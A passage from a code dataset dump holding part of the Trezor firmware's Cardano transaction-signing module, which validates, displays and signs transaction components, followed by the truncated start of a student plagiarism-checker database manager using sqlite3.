CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n output_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n output_items_count, ProcessError(\"Invalid output\")\n )\n with outputs_list.append(output_dict):\n await self._process_babbage_output(output_dict, output, should_show)\n else:\n raise RuntimeError # should be unreachable\n\n def _validate_output(self, output: CardanoTxOutput) -> None:\n from ..helpers import OUTPUT_DATUM_HASH_SIZE\n\n address_parameters = output.address_parameters # local_cache_attribute\n\n if address_parameters is not None and output.address is not None:\n raise ProcessError(\"Invalid output\")\n\n if address_parameters is not None:\n addresses.validate_output_address_parameters(address_parameters)\n self._fail_if_strict_and_unusual(address_parameters)\n elif output.address is not None:\n addresses.validate_output_address(\n output.address, self.msg.protocol_magic, self.msg.network_id\n )\n else:\n raise ProcessError(\"Invalid output\")\n\n # datum hash\n if output.datum_hash is not None:\n if len(output.datum_hash) != OUTPUT_DATUM_HASH_SIZE:\n raise ProcessError(\"Invalid output datum hash\")\n\n # inline datum\n if output.inline_datum_size > 0:\n if output.format != CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n raise ProcessError(\"Invalid output\")\n\n # datum hash and inline datum are mutually exclusive\n if output.datum_hash is not None and output.inline_datum_size > 0:\n raise ProcessError(\"Invalid output\")\n\n # reference script\n if output.reference_script_size > 0:\n if output.format != CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n raise ProcessError(\"Invalid output\")\n\n self.account_path_checker.add_output(output)\n\n async def _show_output_init(self, output: CardanoTxOutput) -> None:\n address_type = self._get_output_address_type(output)\n if (\n output.datum_hash is None\n and output.inline_datum_size == 0\n and address_type in addresses.ADDRESS_TYPES_PAYMENT_SCRIPT\n ):\n await layout.warn_tx_output_no_datum()\n\n if output.asset_groups_count > 0:\n await layout.warn_tx_output_contains_tokens()\n\n if output.address_parameters is not None:\n address = addresses.derive_human_readable(\n self.keychain,\n output.address_parameters,\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n await self._show_output_credentials(output.address_parameters)\n else:\n assert output.address is not None # _validate_output\n address = output.address\n\n await layout.confirm_sending(\n output.amount,\n address,\n \"change\" if self._is_change_output(output) else \"address\",\n self.msg.network_id,\n chunkify=bool(self.msg.chunkify),\n )\n\n async def _show_output_credentials(\n self, address_parameters: messages.CardanoAddressParametersType\n ) -> None:\n await layout.show_change_output_credentials(\n Credential.payment_credential(address_parameters),\n Credential.stake_credential(address_parameters),\n )\n\n def _should_show_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"\n Determines whether the output should be shown. Extracted from _show_output\n because of readability.\n \"\"\"\n\n address_type = self._get_output_address_type(output)\n if (\n output.datum_hash is None\n and output.inline_datum_size == 0\n and address_type in addresses.ADDRESS_TYPES_PAYMENT_SCRIPT\n ):\n # Plutus script address without a datum is unspendable, we must show a warning.\n return True\n\n if self._is_simple_change_output(output):\n # Show change output only if showing details and if it contains plutus data\n has_plutus_data = (\n output.datum_hash is not None\n or output.inline_datum_size > 0\n or output.reference_script_size > 0\n )\n return self.should_show_details and has_plutus_data\n\n return True\n\n def _is_change_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"Used only to determine what message to show to the user when confirming sending.\"\"\"\n return output.address_parameters is not None\n\n def _is_simple_change_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"Used to determine whether an output is a change output with ordinary credentials.\"\"\"\n from ..helpers.credential import should_show_credentials\n\n return output.address_parameters is not None and not should_show_credentials(\n output.address_parameters\n )\n\n async def _process_legacy_output(\n self,\n output_list: HashBuilderList,\n output: CardanoTxOutput,\n should_show: bool,\n ) -> None:\n address = self._get_output_address(output)\n output_list.append(address)\n\n if output.asset_groups_count == 0:\n # Output structure is: [address, amount, datum_hash?]\n output_list.append(output.amount)\n else:\n # Output structure is: [address, [amount, asset_groups], datum_hash?]\n output_value_list: HashBuilderList = HashBuilderList(2)\n with output_list.append(output_value_list):\n await self._process_output_value(output_value_list, output, should_show)\n\n if output.datum_hash is not None:\n if should_show:\n await self._show_if_showing_details(\n layout.confirm_datum_hash(output.datum_hash)\n )\n output_list.append(output.datum_hash)\n\n async def _process_babbage_output(\n self,\n output_dict: HashBuilderDict[int, Any],\n output: CardanoTxOutput,\n should_show: bool,\n ) -> None:\n \"\"\"\n This output format corresponds to the post-Alonzo format in CDDL.\n Note that it is to be used also for outputs with no Plutus elements.\n \"\"\"\n from ..helpers.hash_builder_collection import HashBuilderEmbeddedCBOR\n\n add = output_dict.add # local_cache_attribute\n\n address = self._get_output_address(output)\n add(_BABBAGE_OUTPUT_KEY_ADDRESS, address)\n\n if output.asset_groups_count == 0:\n # Only amount is added to the dict.\n add(_BABBAGE_OUTPUT_KEY_AMOUNT, output.amount)\n else:\n # [amount, asset_groups] is added to the dict.\n output_value_list: HashBuilderList = HashBuilderList(2)\n with add(_BABBAGE_OUTPUT_KEY_AMOUNT, output_value_list):\n await self._process_output_value(output_value_list, output, should_show)\n\n if output.datum_hash is not None:\n if should_show:\n await self._show_if_showing_details(\n layout.confirm_datum_hash(output.datum_hash)\n )\n add(\n _BABBAGE_OUTPUT_KEY_DATUM_OPTION,\n (_DATUM_OPTION_KEY_HASH, output.datum_hash),\n )\n elif output.inline_datum_size > 0:\n inline_datum_list: HashBuilderList = HashBuilderList(2)\n with add(_BABBAGE_OUTPUT_KEY_DATUM_OPTION, inline_datum_list):\n inline_datum_list.append(_DATUM_OPTION_KEY_INLINE)\n inline_datum_cbor: HashBuilderEmbeddedCBOR = HashBuilderEmbeddedCBOR(\n output.inline_datum_size\n )\n with inline_datum_list.append(inline_datum_cbor):\n await self._process_inline_datum(\n inline_datum_cbor, output.inline_datum_size, should_show\n )\n\n if output.reference_script_size > 0:\n reference_script_cbor: HashBuilderEmbeddedCBOR = HashBuilderEmbeddedCBOR(\n output.reference_script_size\n )\n with add(_BABBAGE_OUTPUT_KEY_REFERENCE_SCRIPT, reference_script_cbor):\n await self._process_reference_script(\n reference_script_cbor, output.reference_script_size, should_show\n )\n\n async def _process_output_value(\n self,\n output_value_list: HashBuilderList,\n output: CardanoTxOutput,\n should_show_tokens: bool,\n ) -> None:\n \"\"\"Should be used only when the output contains tokens.\"\"\"\n assert output.asset_groups_count > 0\n\n output_value_list.append(output.amount)\n\n asset_groups_dict: HashBuilderDict[\n bytes, HashBuilderDict[bytes, int]\n ] = HashBuilderDict(\n output.asset_groups_count,\n ProcessError(\"Invalid token bundle in output\"),\n )\n with output_value_list.append(asset_groups_dict):\n await self._process_asset_groups(\n asset_groups_dict,\n output.asset_groups_count,\n should_show_tokens,\n )\n\n # asset groups\n\n async def _process_asset_groups(\n self,\n asset_groups_dict: HashBuilderDict[bytes, HashBuilderDict[bytes, int]],\n asset_groups_count: int,\n should_show_tokens: bool,\n ) -> None:\n for _ in range(asset_groups_count):\n asset_group: messages.CardanoAssetGroup = await ctx_call(\n CardanoTxItemAck(), messages.CardanoAssetGroup\n )\n self._validate_asset_group(asset_group)\n\n tokens: HashBuilderDict[bytes, int] = HashBuilderDict(\n asset_group.tokens_count,\n ProcessError(\"Invalid token bundle in output\"),\n )\n with asset_groups_dict.add(asset_group.policy_id, tokens):\n await self._process_tokens(\n tokens,\n asset_group.policy_id,\n asset_group.tokens_count,\n should_show_tokens,\n )\n\n def _validate_asset_group(\n self, asset_group: messages.CardanoAssetGroup, is_mint: bool = False\n ) -> None:\n INVALID_TOKEN_BUNDLE = (\n ProcessError(\"Invalid mint token bundle\")\n if is_mint\n else ProcessError(\"Invalid token bundle in output\")\n )\n\n if len(asset_group.policy_id) != _MINTING_POLICY_ID_LENGTH:\n raise INVALID_TOKEN_BUNDLE\n if asset_group.tokens_count == 0:\n raise INVALID_TOKEN_BUNDLE\n\n # tokens\n\n async def _process_tokens(\n self,\n tokens_dict: HashBuilderDict[bytes, int],\n policy_id: bytes,\n tokens_count: int,\n should_show_tokens: bool,\n ) -> None:\n for _ in range(tokens_count):\n token: messages.CardanoToken = await ctx_call(\n CardanoTxItemAck(), messages.CardanoToken\n )\n self._validate_token(token)\n if should_show_tokens:\n await layout.confirm_sending_token(policy_id, token)\n\n assert token.amount is not None # _validate_token\n tokens_dict.add(token.asset_name_bytes, token.amount)\n\n def _validate_token(\n self, token: messages.CardanoToken, is_mint: bool = False\n ) -> None:\n INVALID_TOKEN_BUNDLE = (\n ProcessError(\"Invalid mint token bundle\")\n if is_mint\n else ProcessError(\"Invalid token bundle in output\")\n )\n\n if is_mint:\n if token.mint_amount is None or token.amount is not None:\n raise INVALID_TOKEN_BUNDLE\n else:\n if token.amount is None or token.mint_amount is not None:\n raise INVALID_TOKEN_BUNDLE\n\n if len(token.asset_name_bytes) > _MAX_ASSET_NAME_LENGTH:\n raise INVALID_TOKEN_BUNDLE\n\n # inline datum\n\n async def _process_inline_datum(\n self,\n inline_datum_cbor: HashBuilderEmbeddedCBOR,\n inline_datum_size: int,\n should_show: bool,\n ) -> None:\n assert inline_datum_size > 0\n\n chunks_count = self._get_chunks_count(inline_datum_size)\n for chunk_number in range(chunks_count):\n chunk: messages.CardanoTxInlineDatumChunk = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxInlineDatumChunk\n )\n self._validate_chunk(\n chunk.data,\n chunk_number,\n chunks_count,\n ProcessError(\"Invalid inline datum chunk\"),\n )\n if chunk_number == 0 and should_show:\n await self._show_if_showing_details(\n layout.confirm_inline_datum(chunk.data, inline_datum_size)\n )\n inline_datum_cbor.add(chunk.data)\n\n # reference script\n\n async def _process_reference_script(\n self,\n reference_script_cbor: HashBuilderEmbeddedCBOR,\n reference_script_size: int,\n should_show: bool,\n ) -> None:\n assert reference_script_size > 0\n\n chunks_count = self._get_chunks_count(reference_script_size)\n for chunk_number in range(chunks_count):\n chunk: messages.CardanoTxReferenceScriptChunk = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxReferenceScriptChunk\n )\n self._validate_chunk(\n chunk.data,\n chunk_number,\n chunks_count,\n ProcessError(\"Invalid reference script chunk\"),\n )\n if chunk_number == 0 and should_show:\n await self._show_if_showing_details(\n layout.confirm_reference_script(chunk.data, reference_script_size)\n )\n reference_script_cbor.add(chunk.data)\n\n # certificates\n\n async def _process_certificates(self, certificates_list: HashBuilderList) -> None:\n for _ in range(self.msg.certificates_count):\n certificate: messages.CardanoTxCertificate = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxCertificate\n )\n self._validate_certificate(certificate)\n await self._show_certificate(certificate)\n\n if certificate.type == CardanoCertificateType.STAKE_POOL_REGISTRATION:\n pool_parameters = certificate.pool_parameters\n assert pool_parameters is not None # _validate_certificate\n\n pool_items_list: HashBuilderList = HashBuilderList(\n _POOL_REGISTRATION_CERTIFICATE_ITEMS_COUNT\n )\n with certificates_list.append(pool_items_list):\n for item in certificates.cborize_pool_registration_init(\n certificate\n ):\n pool_items_list.append(item)\n\n pool_owners_list: HashBuilderList[bytes] = HashBuilderList(\n pool_parameters.owners_count\n )\n with pool_items_list.append(pool_owners_list):\n await self._process_pool_owners(\n pool_owners_list, pool_parameters.owners_count\n )\n\n relays_list: HashBuilderList[cbor.CborSequence] = HashBuilderList(\n pool_parameters.relays_count\n )\n with pool_items_list.append(relays_list):\n await self._process_pool_relays(\n relays_list, pool_parameters.relays_count\n )\n\n pool_items_list.append(\n certificates.cborize_pool_metadata(pool_parameters.metadata)\n )\n else:\n certificates_list.append(\n certificates.cborize(self.keychain, certificate)\n )\n\n def _validate_certificate(self, certificate: messages.CardanoTxCertificate) -> None:\n certificates.validate(\n certificate,\n self.msg.protocol_magic,\n self.msg.network_id,\n self.account_path_checker,\n )\n\n async def _show_certificate(\n self, certificate: messages.CardanoTxCertificate\n ) -> None:\n from ..helpers.paths import CERTIFICATE_PATH_NAME\n\n if certificate.path:\n await self._fail_or_warn_if_invalid_path(\n SCHEMA_STAKING, certificate.path, CERTIFICATE_PATH_NAME\n )\n\n if certificate.type == CardanoCertificateType.STAKE_POOL_REGISTRATION:\n assert certificate.pool_parameters is not None\n await layout.confirm_stake_pool_parameters(\n certificate.pool_parameters, self.msg.network_id\n )\n await layout.confirm_stake_pool_metadata(\n certificate.pool_parameters.metadata\n )\n else:\n await layout.confirm_certificate(certificate)\n\n # pool owners\n\n async def _process_pool_owners(\n self, pool_owners_list: HashBuilderList[bytes], owners_count: int\n ) -> None:\n owners_as_path_count = 0\n for _ in range(owners_count):\n owner: messages.CardanoPoolOwner = await ctx_call(\n CardanoTxItemAck(), messages.CardanoPoolOwner\n )\n certificates.validate_pool_owner(owner, self.account_path_checker)\n await self._show_pool_owner(owner)\n pool_owners_list.append(\n certificates.cborize_pool_owner(self.keychain, owner)\n )\n\n if owner.staking_key_path:\n owners_as_path_count += 1\n self.pool_owner_path = owner.staking_key_path\n\n certificates.assert_cond(owners_as_path_count == 1)\n\n async def _show_pool_owner(self, owner: messages.CardanoPoolOwner) -> None:\n from ..helpers.paths import POOL_OWNER_STAKING_PATH_NAME\n\n if owner.staking_key_path:\n await self._fail_or_warn_if_invalid_path(\n SCHEMA_STAKING, owner.staking_key_path, POOL_OWNER_STAKING_PATH_NAME\n )\n\n await layout.confirm_stake_pool_owner(\n self.keychain, owner, self.msg.protocol_magic, self.msg.network_id\n )\n\n # pool relays\n\n async def _process_pool_relays(\n self,\n relays_list: HashBuilderList[cbor.CborSequence],\n relays_count: int,\n ) -> None:\n for _ in range(relays_count):\n relay: messages.CardanoPoolRelayParameters = await ctx_call(\n CardanoTxItemAck(), messages.CardanoPoolRelayParameters\n )\n certificates.validate_pool_relay(relay)\n relays_list.append(certificates.cborize_pool_relay(relay))\n\n # withdrawals\n\n async def _process_withdrawals(\n self, withdrawals_dict: HashBuilderDict[bytes, int]\n ) -> None:\n for _ in range(self.msg.withdrawals_count):\n withdrawal: messages.CardanoTxWithdrawal = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxWithdrawal\n )\n self._validate_withdrawal(withdrawal)\n address_bytes = self._derive_withdrawal_address_bytes(withdrawal)\n await self._show_if_showing_details(\n layout.confirm_withdrawal(\n withdrawal, address_bytes, self.msg.network_id\n )\n )\n withdrawals_dict.add(address_bytes, withdrawal.amount)\n\n def _validate_withdrawal(self, withdrawal: messages.CardanoTxWithdrawal) -> None:\n from ..helpers.utils import validate_stake_credential\n\n validate_stake_credential(\n withdrawal.path,\n withdrawal.script_hash,\n withdrawal.key_hash,\n ProcessError(\"Invalid withdrawal\"),\n )\n\n if not 0 <= withdrawal.amount < LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Invalid withdrawal\")\n\n self.account_path_checker.add_withdrawal(withdrawal)\n\n # auxiliary data\n\n async def _process_auxiliary_data(self) -> None:\n from .. import auxiliary_data\n\n msg = self.msg # local_cache_attribute\n\n data: messages.CardanoTxAuxiliaryData = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxAuxiliaryData\n )\n auxiliary_data.validate(data, msg.protocol_magic, msg.network_id)\n\n (\n auxiliary_data_hash,\n auxiliary_data_supplement,\n ) = auxiliary_data.get_hash_and_supplement(\n self.keychain, data, msg.protocol_magic, msg.network_id\n )\n await auxiliary_data.show(\n self.keychain,\n auxiliary_data_hash,\n data.cvote_registration_parameters,\n msg.protocol_magic,\n msg.network_id,\n self.should_show_details,\n )\n self.tx_dict.add(_TX_BODY_KEY_AUXILIARY_DATA, auxiliary_data_hash)\n\n await ctx_call(auxiliary_data_supplement, messages.CardanoTxHostAck)\n\n # minting\n\n async def _process_minting(\n self, minting_dict: HashBuilderDict[bytes, HashBuilderDict]\n ) -> None:\n token_minting: messages.CardanoTxMint = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxMint\n )\n\n await layout.warn_tx_contains_mint()\n\n for _ in range(token_minting.asset_groups_count):\n asset_group: messages.CardanoAssetGroup = await ctx_call(\n CardanoTxItemAck(), messages.CardanoAssetGroup\n )\n self._validate_asset_group(asset_group, is_mint=True)\n\n tokens: HashBuilderDict[bytes, int] = HashBuilderDict(\n asset_group.tokens_count, ProcessError(\"Invalid mint token bundle\")\n )\n with minting_dict.add(asset_group.policy_id, tokens):\n await self._process_minting_tokens(\n tokens,\n asset_group.policy_id,\n asset_group.tokens_count,\n )\n\n # minting tokens\n\n async def _process_minting_tokens(\n self,\n tokens: HashBuilderDict[bytes, int],\n policy_id: bytes,\n tokens_count: int,\n ) -> None:\n for _ in range(tokens_count):\n token: messages.CardanoToken = await ctx_call(\n CardanoTxItemAck(), messages.CardanoToken\n )\n self._validate_token(token, is_mint=True)\n await layout.confirm_token_minting(policy_id, token)\n\n assert token.mint_amount is not None # _validate_token\n tokens.add(token.asset_name_bytes, token.mint_amount)\n\n # script data hash\n\n async def _process_script_data_hash(self) -> None:\n assert self.msg.script_data_hash is not None\n self._validate_script_data_hash()\n await self._show_if_showing_details(\n layout.confirm_script_data_hash(self.msg.script_data_hash)\n )\n self.tx_dict.add(_TX_BODY_KEY_SCRIPT_DATA_HASH, self.msg.script_data_hash)\n\n def _validate_script_data_hash(self) -> None:\n from ..helpers import SCRIPT_DATA_HASH_SIZE\n\n assert self.msg.script_data_hash is not None\n if len(self.msg.script_data_hash) != SCRIPT_DATA_HASH_SIZE:\n raise ProcessError(\"Invalid script data hash\")\n\n # collateral inputs\n\n async def _process_collateral_inputs(\n self, collateral_inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.collateral_inputs_count):\n collateral_input: messages.CardanoTxCollateralInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxCollateralInput\n )\n self._validate_collateral_input(collateral_input)\n await self._show_collateral_input(collateral_input)\n collateral_inputs_list.append(\n (collateral_input.prev_hash, collateral_input.prev_index)\n )\n\n def _validate_collateral_input(\n self, collateral_input: messages.CardanoTxCollateralInput\n ) -> None:\n if len(collateral_input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid collateral input\")\n\n async def _show_collateral_input(\n self, collateral_input: messages.CardanoTxCollateralInput\n ) -> None:\n if self.msg.total_collateral is None:\n await self._show_if_showing_details(\n layout.confirm_collateral_input(collateral_input)\n )\n\n # required signers\n\n async def _process_required_signers(\n self, required_signers_list: HashBuilderList[bytes]\n ) -> None:\n from ..helpers.utils import get_public_key_hash\n\n for _ in range(self.msg.required_signers_count):\n required_signer: messages.CardanoTxRequiredSigner = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxRequiredSigner\n )\n self._validate_required_signer(required_signer)\n await self._show_if_showing_details(\n layout.confirm_required_signer(required_signer)\n )\n\n key_hash = required_signer.key_hash or get_public_key_hash(\n self.keychain, required_signer.key_path\n )\n required_signers_list.append(key_hash)\n\n def _validate_required_signer(\n self, required_signer: messages.CardanoTxRequiredSigner\n ) -> None:\n from ..helpers import ADDRESS_KEY_HASH_SIZE\n\n key_path = required_signer.key_path # local_cache_attribute\n\n INVALID_REQUIRED_SIGNER = ProcessError(\"Invalid required signer\")\n\n if required_signer.key_hash and key_path:\n raise INVALID_REQUIRED_SIGNER\n\n if required_signer.key_hash:\n if len(required_signer.key_hash) != ADDRESS_KEY_HASH_SIZE:\n raise INVALID_REQUIRED_SIGNER\n elif key_path:\n if not (\n seed.is_shelley_path(key_path)\n or seed.is_multisig_path(key_path)\n or seed.is_minting_path(key_path)\n ):\n raise INVALID_REQUIRED_SIGNER\n else:\n raise INVALID_REQUIRED_SIGNER\n\n # collateral return\n\n async def _process_collateral_return(self) -> None:\n output: CardanoTxOutput = await ctx_call(CardanoTxItemAck(), CardanoTxOutput)\n self._validate_collateral_return(output)\n should_show_init = self._should_show_collateral_return_init(output)\n should_show_tokens = self._should_show_collateral_return_tokens(output)\n if should_show_init:\n await self._show_collateral_return_init(output)\n\n # Datums and reference scripts are forbidden, see _validate_collateral_return.\n output_items_count = 2\n if output.format == CardanoTxOutputSerializationFormat.ARRAY_LEGACY:\n output_list: HashBuilderList = HashBuilderList(output_items_count)\n with self.tx_dict.add(_TX_BODY_KEY_COLLATERAL_RETURN, output_list):\n await self._process_legacy_output(\n output_list, output, should_show_tokens\n )\n elif output.format == CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n output_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n output_items_count, ProcessError(\"Invalid collateral return\")\n )\n with self.tx_dict.add(_TX_BODY_KEY_COLLATERAL_RETURN, output_dict):\n await self._process_babbage_output(\n output_dict, output, should_show_tokens\n )\n else:\n raise RuntimeError # should be unreachable\n\n def _validate_collateral_return(self, output: CardanoTxOutput) -> None:\n self._validate_output(output)\n\n address_type = self._get_output_address_type(output)\n if address_type not in addresses.ADDRESS_TYPES_PAYMENT_KEY:\n raise ProcessError(\"Invalid collateral return\")\n\n if (\n output.datum_hash is not None\n or output.inline_datum_size > 0\n or output.reference_script_size > 0\n ):\n raise ProcessError(\"Invalid collateral return\")\n\n async def _show_collateral_return_init(self, output: CardanoTxOutput) -> None:\n # We don't display missing datum warning since datums are forbidden.\n\n if output.asset_groups_count > 0:\n await layout.warn_tx_output_contains_tokens(is_collateral_return=True)\n\n if output.address_parameters is not None:\n address = addresses.derive_human_readable(\n self.keychain,\n output.address_parameters,\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n await self._show_output_credentials(\n output.address_parameters,\n )\n else:\n assert output.address is not None # _validate_output\n address = output.address\n\n await layout.confirm_sending(\n output.amount,\n address,\n \"collateral-return\",\n self.msg.network_id,\n chunkify=bool(self.msg.chunkify),\n )\n\n def _should_show_collateral_return_init(self, output: CardanoTxOutput) -> bool:\n if self.msg.total_collateral is None:\n return True\n\n if self._is_simple_change_output(output):\n return False\n\n return True\n\n def _should_show_collateral_return_tokens(self, output: CardanoTxOutput) -> bool:\n if self._is_simple_change_output(output):\n return False\n\n return self.should_show_details\n\n # reference inputs\n\n async def _process_reference_inputs(\n self, reference_inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.reference_inputs_count):\n reference_input: messages.CardanoTxReferenceInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxReferenceInput\n )\n self._validate_reference_input(reference_input)\n await self._show_if_showing_details(\n layout.confirm_reference_input(reference_input)\n )\n reference_inputs_list.append(\n (reference_input.prev_hash, reference_input.prev_index)\n )\n\n def _validate_reference_input(\n self, reference_input: messages.CardanoTxReferenceInput\n ) -> None:\n if len(reference_input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid reference input\")\n\n # witness requests\n\n async def _process_witness_requests(self, tx_hash: bytes) -> CardanoTxResponseType:\n response: CardanoTxResponseType = CardanoTxItemAck()\n\n for _ in range(self.msg.witness_requests_count):\n witness_request = await ctx_call(response, messages.CardanoTxWitnessRequest)\n self._validate_witness_request(witness_request)\n path = witness_request.path\n await self._show_witness_request(path)\n if seed.is_byron_path(path):\n response = self._get_byron_witness(path, tx_hash)\n else:\n response = self._get_shelley_witness(path, tx_hash)\n\n return response\n\n def _validate_witness_request(\n self, witness_request: messages.CardanoTxWitnessRequest\n ) -> None:\n self.account_path_checker.add_witness_request(witness_request)\n\n async def _show_witness_request(\n self,\n witness_path: list[int],\n ) -> None:\n await layout.confirm_witness_request(witness_path)\n\n # helpers\n\n def _assert_tx_init_cond(self, condition: bool) -> None:\n if not condition:\n raise ProcessError(\"Invalid tx signing request\")\n\n def _is_network_id_verifiable(self) -> bool:\n \"\"\"\n Checks whether there is at least one element that contains information about\n network ID, otherwise Trezor cannot guarantee that the tx is actually meant for\n the given network.\n\n Note: Shelley addresses contain network id. The intended network of Byron\n addresses can be determined based on whether they contain the protocol magic.\n These checks are performed during address validation.\n \"\"\"\n return (\n self.msg.include_network_id\n or self.msg.outputs_count != 0\n or self.msg.withdrawals_count != 0\n )\n\n def _get_output_address(self, output: CardanoTxOutput) -> bytes:\n if output.address_parameters:\n return addresses.derive_bytes(\n self.keychain,\n output.address_parameters,\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n else:\n assert output.address is not None # _validate_output\n return addresses.get_bytes_unsafe(output.address)\n\n def _get_output_address_type(self, output: CardanoTxOutput) -> CardanoAddressType:\n if output.address_parameters:\n return output.address_parameters.address_type\n assert output.address is not None # _validate_output\n return addresses.get_type(addresses.get_bytes_unsafe(output.address))\n\n def _derive_withdrawal_address_bytes(\n self, withdrawal: messages.CardanoTxWithdrawal\n ) -> bytes:\n from trezor.enums import CardanoAddressType\n\n reward_address_type = (\n CardanoAddressType.REWARD\n if withdrawal.path or withdrawal.key_hash\n else CardanoAddressType.REWARD_SCRIPT\n )\n return addresses.derive_bytes(\n self.keychain,\n messages.CardanoAddressParametersType(\n address_type=reward_address_type,\n address_n_staking=withdrawal.path,\n staking_key_hash=withdrawal.key_hash,\n script_staking_hash=withdrawal.script_hash,\n ),\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n\n def _get_chunks_count(self, data_size: int) -> int:\n assert data_size > 0\n return (data_size - 1) // _MAX_CHUNK_SIZE + 1\n\n def _validate_chunk(\n self,\n chunk_data: bytes,\n chunk_number: int,\n chunks_count: int,\n error: ProcessError,\n ) -> None:\n if chunk_number < chunks_count - 1 and len(chunk_data) != _MAX_CHUNK_SIZE:\n raise error\n if chunk_number == chunks_count - 1 and len(chunk_data) > _MAX_CHUNK_SIZE:\n raise error\n\n def _get_byron_witness(\n self, path: list[int], tx_hash: bytes\n ) -> messages.CardanoTxWitnessResponse:\n node = self.keychain.derive(path)\n return messages.CardanoTxWitnessResponse(\n type=CardanoTxWitnessType.BYRON_WITNESS,\n pub_key=derive_public_key(self.keychain, path),\n signature=self._sign_tx_hash(tx_hash, path),\n chain_code=node.chain_code(),\n )\n\n def _get_shelley_witness(\n self, path: list[int], tx_hash: bytes\n ) -> messages.CardanoTxWitnessResponse:\n return messages.CardanoTxWitnessResponse(\n type=CardanoTxWitnessType.SHELLEY_WITNESS,\n pub_key=derive_public_key(self.keychain, path),\n signature=self._sign_tx_hash(tx_hash, path),\n )\n\n def _sign_tx_hash(self, tx_body_hash: bytes, path: list[int]) -> bytes:\n from trezor.crypto.curve import ed25519\n\n node = self.keychain.derive(path)\n return ed25519.sign_ext(\n node.private_key(), node.private_key_ext(), tx_body_hash\n )\n\n async def _fail_or_warn_if_invalid_path(\n self, schema: PathSchema, path: list[int], path_name: str\n ) -> None:\n if not schema.match(path):\n await self._fail_or_warn_path(path, path_name)\n\n async def _fail_or_warn_path(self, path: list[int], path_name: str) -> None:\n if safety_checks.is_strict():\n raise DataError(f\"Invalid {path_name.lower()}\")\n else:\n await layout.warn_path(path, path_name)\n\n def _fail_if_strict_and_unusual(\n self, address_parameters: messages.CardanoAddressParametersType\n ) -> None:\n from ..helpers.paths import (\n CHANGE_OUTPUT_PATH_NAME,\n CHANGE_OUTPUT_STAKING_PATH_NAME,\n )\n\n if not safety_checks.is_strict():\n return\n\n if Credential.payment_credential(address_parameters).is_unusual_path:\n raise DataError(f\"Invalid {CHANGE_OUTPUT_PATH_NAME.lower()}\")\n\n if Credential.stake_credential(address_parameters).is_unusual_path:\n raise DataError(f\"Invalid {CHANGE_OUTPUT_STAKING_PATH_NAME.lower()}\")\n\n async def _show_if_showing_details(self, layout_fn: Awaitable) -> None:\n if self.should_show_details:\n await layout_fn\n","repo_name":"trezor/trezor-firmware","sub_path":"core/src/apps/cardano/sign_tx/signer.py","file_name":"signer.py","file_ext":"py","file_size_in_byte":47776,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"9872841550","text":"'''author = Jarred De Beer, Yaseen Hamdulay & Merishka Lalla\nDate: 22/9/2014\nA database class to manage all insertions into different tables. These tables being Students, Assignments, Signatures\nand Matches. Each table has a series of different values but linked together through a Primary Key which is linked through\nan ID and a foreign key which is linked through other relevant column values.\n\nDatabase used was sqlite3.\n'''\n\n#__author__ = 'Merishka Lalla'\nimport os\nimport sqlite3\nimport time\nfrom model.signature import Signature\nfrom model.match import Match\nfrom model.assignment import Assignment\nfrom model.submissions import Submission\nfrom model.signaturematch import SignatureMatch\nfrom model.student import Student\nfrom signaturemanager import SignatureManager\nimport os.path\n\nclass DatabaseManager:\n conn = None\n\n '''A initiator method to allow the database to connect to the class for further database handling.'''\n\n def __init__(self, database_file='cheaters.db'):\n self.conn = sqlite3.connect(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', database_file))\n self.conn.text_factory = str\n '''The initialise database method connects a cursor and reads a sql script. The script is read and executed.\n Once executed, tables with relevant columns is created and initiated. There after the cursor is closed and the\n changes are committed.'''\n self.initialise_database()\n self.initialise_signature_manager()\n\n\n '''initialise_database runs the schema.sql script to generate database for later use in terms of data population and\n data manipulation.'''\n\n def initialise_database(self):\n c = self.conn.cursor()\n file = open(os.path.dirname(os.path.realpath(__file__))+'/schema.sql','r')\n c.executescript(file.read())\n c.close()\n self.conn.commit()\n\n '''initialise_signatures initializes the signatures which have been generated. These signatures are stored in an array\n after being looped through.'''\n\n def initialise_signature_manager(self):\n self.signature_manager = SignatureManager()\n c = self.conn.cursor()\n c.execute('SELECT NgramHash, SubmissionId, LineNumber FROM Signatures')\n result = []\n for row in c:\n self.signature_manager.store_signature(Signature(*row), row[1])\n c.close()\n\n\n '''Store_signatures stores the signatures which have been generated. These signatures show the aspects of code which\n are suspected to be copied or cheated. The generated signatures are stored in the database using the insert method.\n Signatures is a list and is stored element by element before cursor is closed.'''\n\n def store_signatures(self,signatures,submission_id):\n c = self.conn.cursor()\n for s in signatures:\n signature_values = (s.line_number_mine,s.ngram_hash, submission_id)\n c.execute(\"INSERT INTO Signatures(LineNumber,NgramHash,SubmissionId) VALUES(?,?,?)\",signature_values)\n self.signature_manager.store_signature(s, submission_id)\n c.close()\n self.conn.commit()\n\n '''store_submissions stores the submissions sent to the program which is used to be checked against other\n submissions. This method accepts the joint files from the .zip folder, assignment 